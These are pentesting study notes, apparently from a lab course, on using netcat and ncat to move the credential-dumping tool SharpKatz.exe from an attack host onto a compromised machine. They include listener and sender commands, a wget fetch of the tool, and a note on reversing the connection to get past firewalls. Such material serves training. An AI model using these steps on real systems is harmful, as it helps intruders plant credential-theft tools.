Netcat | Notion

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP, which means that we can use it for file transfer operations.

The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.

File Transfer with Netcat and Ncat

The target or attacking machine can be used to initiate the connection, which is helpful if a firewall prevents access to the target.

we'll transfer SharpKatz.exe from our Pwnbox onto the compromised machine. We'll do it using two methods. Let's work through the first one.

Netcat (nc) on the compromised machine, listening with option -l, selecting the port to listen with the option -p 8000, and redirect the stdout using a single greater-than > followed by the filename, SharpKatz.exe.

Netcat - Compromised Machine - Listening on Port 8000

# Example using Original Netcat
nc -l -p 8000 > SharpKatz.exe

# If the compromised machine is using Ncat, we'll need to specify --recv-only to close the connection once the file transfer is finished.
# Example using Ncat
ncat -l -p 8000 --recv-only > SharpKatz.exe

Netcat - Attack Host - Sending File to Compromised machine

From our attack host, we'll connect to the compromised machine on port 8000 using Netcat and send the file SharpKatz.exe as input to Netcat. The option -q 0 will tell Netcat to close the connection once it finishes. That way, we'll know when the file transfer was completed.

wget -q <https://github.com/SharpKatz.exe>
# Example using Original Netcat
nc -q 0 192.168.49.128 8000 < SharpKatz.exe

Ncat on our attacking host, we can opt for --send-only rather than -q. The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. Typically, Ncat would continue running until the network connection is closed, as the remote side may transmit additional data. However, with --send-only, there is no need to anticipate further incoming information.

Ncat - Attack Host - Sending File to Compromised machine

wget -q <https://github.com/SharpKatz.exe>
# Example using Ncat
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our Pwnbox and send the file SharpKatz.exe as input to Netcat.